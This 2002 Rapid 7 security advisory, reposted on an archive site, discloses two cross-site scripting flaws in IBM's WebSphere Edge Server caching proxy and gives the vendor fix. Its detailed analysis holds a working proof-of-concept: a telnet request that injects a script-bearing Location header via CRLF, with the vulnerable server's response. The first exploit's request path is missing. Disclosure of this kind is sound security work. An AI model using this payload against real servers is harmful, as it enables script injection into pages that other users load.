Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Web :: Servers :: webspxss.txt

IBM WebSphere Edge Server Caching Proxy XSS

                     Rapid 7, Inc. Security Advisory

        Visit to download NeXpose(tm), our
         advanced vulnerability scanner. Linux and Windows 2000
                       versions are available now!

Rapid 7 Advisory R7-0008
IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting Issues

   Published:  October 23, 2002
   Revision:   1.0

   o First XSS issue (standard XSS)
      IBM:        APAR# IY24527

      CVE:        CAN-2002-1167

      Bugtraq:    6000

   o Second XSS issue (HTTP header injection)
      IBM:        APAR# IY35139

      CVE:        CAN-2002-1168

      Bugtraq:    6001

1. Affected system(s):

    o IBM Web Traffic Express Caching Proxy Server v4.x (bundled
      with IBM WebSphere Edge Server v2.0)
    o IBM Web Traffic Express Caching Proxy Server v3.6

2. Summary

   IBM Web Traffic Express Caching Proxy server is vulnerable to
   cross site scripting.  The Caching Proxy server allows script code
   to be injected into pages using standard cross-site scripting
   techniques.  A second, variant attack allows the HTTP headers to
   be manipulated.

   IBM now bundles Web Traffic Express v4.0 with WebSphere Edge Server
   v2.0.  IBM Web Traffic Express v3.6 and earlier were separately
   shipping products.  

3. Vendor status and information

   IBM Software

      IBM was notified of this issue and has released efix build number for Caching Proxy Server v4.x, which fixes this issue
      and other security issues (see Rapid 7 advisory R7-0007 for more
      information: ).
      IBM is tracking the first (standard) XSS issue as APAR# IY24527.
      IBM is tracking the second (header injection) XSS issue as
      APAR# IY35139.

4. Solution

   IBM customers should install Caching Proxy efix build or
   higher.  Efix builds can be downloaded from IBM's secure FTP site.
   For more information on obtaining efix builds, contact IBM support
   with the APAR numbers listed above.

   The fixes have also been ported back to the Web Traffic Express v3.6
   code base.  Customers running v3.6 should contact IBM support for
   more information on how to upgrade to a newer build.

5. Detailed analysis

   There are two XSS techniques that can be used against the caching
   proxy server.  Please note that the following text may be
   wrapped or otherwise mangled by mail clients or gateways.  You
   should refer to the original advisory if there is a question about
   the exact text.

   a) Standard XSS exploit against Web Traffic Express Caching Proxy

   Request the following path from the caching proxy server:


   b) XSS exploit against Web Traffic Express Caching Proxy, adding a
      second "Location:" header by using %0a%0d

   telnet 80
   Connected to
   Escape character is '^]'.
   GET /%0a%0dLocation:%20"><img%20src="javascript:alert(document.domain)"> HTTP/1.0

   HTTP/1.1 302 Found
   Server: IBM-PROXY-WTE-US/3.6
   Date: Fri, 18 Oct 2002 03:44:18 GMT
   Location: http:/<img src="javascript:alert(document.domain)">
   Accept-Ranges: bytes
   Content-Type: text/html
   Content-Length: 443
   Last-Modified: Fri, 26 Jul 2002 03:44:18 GMT


6. Contact Information

   Rapid 7 Security Advisories
   Phone:   +1 (212) 558-8700

7. Disclaimer and Copyright

   Rapid 7, Inc. is not responsible for the misuse of the information
   provided in our security advisories.  These advisories are a service
   to the professional security community.  There are NO WARRANTIES
   with regard to this information.  Any application or distribution of
   this information constitutes acceptance AS IS, at the user's own
   risk.  This information is subject to change without notice.

   This advisory Copyright (C) 2002 Rapid 7, Inc.  Permission is
   hereby granted to redistribute this advisory, providing that no
   changes are made and that the copyright notices and disclaimers
   remain intact.
Version: GnuPG v1.0.7 (OpenBSD)


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH